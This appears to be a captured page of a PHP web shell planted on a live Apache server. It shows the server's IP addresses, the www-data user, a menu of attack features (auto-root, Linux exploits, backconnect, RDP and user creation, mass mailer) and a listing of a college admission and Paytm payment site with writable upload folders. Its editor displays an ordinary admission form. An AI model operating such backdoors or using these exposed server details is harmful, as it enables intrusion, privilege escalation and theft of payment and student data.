Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.188.190.212
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kusdde /
adm_old /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxr-xr-x
Reports
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
documentation
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
MainPage.html
41.9
KB
-rwxr-xr-x
MainPage_2.html
5.89
KB
-rwxr-xr-x
Notification.pdf
1.24
MB
-rwxr-xr-x
Registrationpage.html
6.37
KB
-rwxr-xr-x
Reprint.html
7.53
KB
-rwxr-xr-x
Thumbs.db
3
KB
-rwxr-xr-x
admAppForm.html
9.88
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
appForm.html
16.39
KB
-rwxr-xr-x
appStatus2.html
12.3
KB
-rwxr-xr-x
cconfig.php
1.22
KB
-rwxr-xr-x
challan.html
8.38
KB
-rwxr-xr-x
chkResponse.php
434
B
-rwxr-xr-x
config_paytm.php
1.35
KB
-rwxr-xr-x
encdec_paytm.php
7.8
KB
-rwxr-xr-x
favicon.ico
1.83
KB
-rwxr-xr-x
h1.css
2.4
KB
-rwxr-xr-x
h1.html
5
KB
-rwxr-xr-x
h1.js
808
B
-rwxr-xr-x
homepage.html
8.5
KB
-rwxr-xr-x
index.html
10.01
KB
-rwxr-xr-x
index1.html
2.88
KB
-rwxr-xr-x
index2.html
5.09
KB
-rwxr-xr-x
logo.png
588.37
KB
-rwxr-xr-x
payment_gateway.php
7.78
KB
-rwxr-xr-x
paymentresponce.php
10.12
KB
-rwxr-xr-x
pgResponse.php
9.89
KB
-rwxr-xr-x
pgResponse_.php
9.12
KB
-rwxr-xr-x
readmission.html
6.53
KB
-rwxr-xr-x
upload.php
393
B
-rwxr-xr-x
upload1.php
389
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : appStatus2.html
<div class="row clearfix" id = "subject_det"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12 m-l--50"> <div class="card"> <div class="header"> <h2>Course Selection </h2> <span class="pull-right"> <b>Step 2 of 3</b> </span> </div> <div class="body"> <div class="row clearfix"> <div class="col-md-4"> <b>Graduation / Diploma</b> <div class="form-group"> <div class="form-line"> <select id = "graduation" class="form-control" onchange = "getdegreedetails()"> <option value=""> -Select- </option> <option value="pg" >P.G (Post Graduation)</option> <option value="ug">U.G (Under Graduation)</option> <option value="pgd">P.G.D (Post Graduation Diploma)</option> </select> </div> </div> </div> <div class="col-md-4"> <b>Course</b> <div class="form-group"> <div class="form-line"> <select disabled id = "degree" class="form-control" onchange = "getcombinationdetails()"> </select> </div> </div> </div> <div class="col-md-4"> <b>Subject</b> <div class="form-group"> <div class="form-line"> <select disabled id = "subject" class="form-control" onchange = "getsubjectdetails()"> </select> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-4"> <b>Medium</b> <div class="form-group"> <div class="form-line"> <select id = "moi" class="form-control"> <option value=""> -Select- </option> <option value="Kannada" >Kannada</option> <option value="English">English</option> </select> </div> </div> </div> <div class="col-md-4"> <b>Options</b> <div class="form-group"> <div class="form-line"> <select id = "options1" class="form-control"> </select> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-12"> <center><b>Paper Detail of selected Course</b></center> <div class="form-group"> <div class="form-line"> <div id = "subdet"> </div> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-4"> <b>State</b> <div class="form-group"> <div class="form-line"> <select id = "state" class="form-control"> <option value=""> -Select- </option> <option value="Karnataka" >Karnataka</option> </select> </div> </div> </div> <div class="col-md-4"> <b>District</b> <div class="form-group"> <div class="form-line"> <select id = "district" class="form-control"> <option value=""> -Select- </option> <option value="Shimoga" >Shimoga</option> </select> </div> </div> </div> <div class="col-md-4"> <b>Counselling Center Name</b> <div class="form-group"> <div class="form-line"> <select id = "centercode" class="form-control"> </select> </div> </div> </div> </div> </div> <div class="footer"> <button type="button" class="btn btn-primary waves-effect btn-lg" onclick = "Showperdetl()">Previous</button> <button type="button" class="btn btn-primary waves-effect btn-lg m-l-8" onclick = "Showfeedetl()">Next</button> </div> </div> </div> </div> <div class="row clearfix" style="display: ;" id = "fee_det"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12 m-l--50"> <div class="card"> <div class="header"> <h2>Counselling Center / Fee Deatils </h2> <span class="pull-right"> <b>Step 3 of 3</b> </span> </div> <div class="body"> <div class="row clearfix"> <div class="col-md-4"> <b>Eligibility Exam Passed</b> <div class="form-group"> <div class="form-line"> <input type = 'text' class="form-control" id = "qaldeg"> </div> </div> </div> <div class="col-md-4"> <b>Combination / Subject Studied</b> <div class="form-group"> <div class="form-line"> <input type = 'text' class="form-control" id = "qalsub"> </div> </div> </div> <div class="col-md-4"> <b>Electives / If Any</b> <div class="form-group"> <div class="form-line"> <input type = 'text' class="form-control" id = "qaloption"> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-4"> <b>Register Number</b> <div class="form-group"> <div class="form-line"> <input type = 'text' class="form-control" id = "qalreg"> </div> </div> </div> <div class="col-md-7"> <b>Month & Year of Passing</b> <div class="form-group"> <div class="form-line col-md-3"> <select id="qalpassmonth" class="form-control" > <option selected="selected" value="0">- Month -</option> <option >January</option> <option >February</option> <option >March</option> <option >April</option> <option >May</option> <option >June</option> <option >July</option> <option >August</option> <option >September</option> <option >October</option> <option >November</option> <option >December</option> </select> </div> </div> <div class="form-line"> <div class="form-line col-md-3"> <select id = "qalpassyear" class="form-control"> </select> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-12"> <b>College/Institution/University where you studied (Including Place Name)</b> <div class="form-group"> <div class="form-line"> <div id = "subdet"> <input type = 'text' class="form-control col-md-8" id = "qalinstitut"> </div> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-12"> <center><b>Fee Payment Details</b></center> <div class="form-group"> <div class="form-line"> <div id = "feedet"> </div> </div> </div> </div> </div> <div class="row clearfix"> <div class="col-md-4"> <b>Payment Type</b> <div class="form-group"> <div class="form-line"> <select id = "paymenttype" class="form-control"> </select> </div> </div> </div> </div> </div> <div class="footer"> <button type="button" class="btn btn-primary waves-effect btn-lg" onclick = "Showsubdetl()">Previous</button> <button type="button" class="btn btn-primary waves-effect btn-lg" onclick = "PrintBankchallan('1234')">Submit</button> </div> </div> </div> </div> <script type="text/javascript"> $('#statusDetl').addClass("hidden"); var $demoMaskedInput = $('.daterange'); //Date $demoMaskedInput.find('.date').inputmask('dd/mm/yyyy', { placeholder: '__/__/____' }); $("#fromdate").val(getDate()); $("#todate").val(getDate()); $("#S4").keypress(function (e){ var key = e.which; if(key == 13) // the enter key code { getDetails(); } }); $(document).ready(function () { var inputs = $('input, select').keypress(function (e) { if (e.which == 13) { e.preventDefault(); var nextInput = inputs.get(inputs.index(this) + 1); if (nextInput) { nextInput.focus(); } } }); }); </script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <script src="plugins/jquery-steps/jquery.steps.js"></script> <script src="js/pages/forms/form-wizard.js"></script> <script src="plugins/sweetalert/sweetalert.min.js"></script> <!-- Autosize Plugin Js --> <script src="js/form_submit.js"></script>
Close